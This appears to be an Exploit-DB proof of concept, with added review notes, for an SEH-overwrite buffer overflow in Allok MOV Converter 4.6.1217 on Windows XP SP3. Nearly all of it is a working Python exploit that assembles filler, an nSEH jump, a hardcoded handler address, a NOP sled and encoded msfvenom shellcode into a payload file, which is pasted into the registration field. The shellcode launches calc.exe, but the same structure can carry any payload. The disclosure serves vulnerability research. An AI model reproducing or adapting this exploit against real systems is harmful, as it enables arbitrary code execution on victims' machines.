Allok MOV Converter 4.6.1217 – Buffer Overflow (SEH)

  • 作者: Shubham Singh
    日期: 2018-07-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45101/
  • # Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
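    # Date: 2018-07-29
    # Discovery by: Shubham Singh
    # Known As: Spirited Wolf [Twitter: @Pwsecspirit]
    # Software Link: http://www.alloksoft.com/allok_movconverter.exe
    # Tested Version: 4.6.1217
    # Tested on OS: Windows XP Service Pack 3 x86
    # Greetz: @hexachordanu @FuzzySec @LiveOverflow

    # Steps to Reproduce: run this script; it writes the payload to "exploit.txt".
    # Start Allok MOV Converter 4.6.1217, paste the contents of "exploit.txt" into
    # the "License Name" field and click "Register". calc.exe should pop up.
    #
    # Review notes:
    #  - The 780-byte offset and the SEH handler address were observed on the
    #    Windows XP SP3 x86 test box only. The handler is an absolute address, so
    #    both values must be re-derived for any other OS/build; the PoC does not
    #    name the module the address lives in (presumably a non-SafeSEH module
    #    holding a POP/POP/RET - verify before reuse).
    #  - The shellcode is an opaque msfvenom blob copied from a public PoC. Do not
    #    trust it blindly: regenerate it with the msfvenom line given next to it,
    #    or at least disassemble it, before running it anywhere.
    #  - The file holds raw bytes (0x90, 0xEB, ...). Whether they survive the
    #    copy/paste into the ANSI edit control depends on the editor and the
    #    target's code page - presumably the reason for the bad-char list below.
    #  - Bytes literals are used so the script runs unchanged on Python 2 and 3
    #    (the original used str literals, which Python 3's binary-mode write()
    #    rejects with TypeError).

    import struct

    # Bytes the target mangles on the way into the License Name field; every
    # component of the payload (filler, SEH chain, NOP sled, shellcode) must
    # avoid all of them.
    BAD_CHARS = b"\x00\x08\x09\x0a\x0b\x0c\x0d"

    # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
    # 220 bytes; the leading bytes match a shikata_ga_nai decoder stub.
    SHELLCODE = b"".join([
        b"\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31",
        b"\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12",
        b"\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e",
        b"\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9",
        b"\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d",
        b"\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91",
        b"\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd",
        b"\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7",
        b"\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4",
        b"\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d",
        b"\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60",
        b"\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28",
        b"\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77",
        b"\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26",
        b"\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95",
        b"\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b",
        b"\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae",
    ])


    def build_payload(offset=780, seh_handler=0x76012579, nop_count=16, trailer=100):
        """Assemble the SEH-overwrite payload and return it as bytes.

        Layout, with positions relative to the start of the nSEH record:
          [0, offset) of the buffer : filler 'A's up to the nSEH pointer
          +0 .. +3                  : nSEH = ``jmp short +0x10`` followed by two NOPs
          +4 .. +7                  : SEH  = ``seh_handler``, packed little-endian
          +8 .. +8+nop_count        : NOP sled
          then                      : SHELLCODE
          then                      : ``trailer`` more filler 'A's

        ``jmp short +0x10`` is relative to the end of its own two-byte encoding,
        so execution lands 18 bytes past the start of nSEH, i.e. 10 bytes into
        the default 16-byte sled, and slides into the shellcode.

        Args:
            offset: number of filler bytes before the nSEH record (780 on the
                tested build).
            seh_handler: 32-bit address written over the SEH handler pointer
                (0x76012579 on the XP SP3 x86 test box; not portable).
            nop_count: length of the NOP sled between SEH and the shellcode.
                Must stay >= 10 or the short jump lands past the sled.
            trailer: number of padding bytes appended after the shellcode.

        Returns:
            The complete payload as bytes.

        Raises:
            ValueError: if the assembled payload contains any byte from BAD_CHARS
                (e.g. a handler address with a zero byte) or if nop_count is too
                small for the fixed ``jmp short +0x10`` to land inside the sled.
        """
        if nop_count < 10:
            raise ValueError("nop_count must be >= 10 for jmp short +0x10 to hit the sled")

        filler = b"\x41" * offset
        nseh = b"\xeb\x10\x90\x90"               # jmp short +0x10 ; nop ; nop
        seh = struct.pack("<I", seh_handler)     # handler address, little-endian
        sled = b"\x90" * nop_count
        padding = b"\x41" * trailer

        payload = b"".join([filler, nseh, seh, sled, SHELLCODE, padding])

        # Fail loudly rather than hand the target a payload it will truncate or
        # mangle; with the default arguments this check passes.
        offending = sorted(set(bytearray(payload)) & set(bytearray(BAD_CHARS)))
        if offending:
            raise ValueError(
                "payload contains bad chars: %s"
                % ", ".join("0x%02x" % b for b in offending)
            )
        return payload


    if __name__ == "__main__":
        with open("exploit.txt", "wb") as fh:
            fh.write(build_payload())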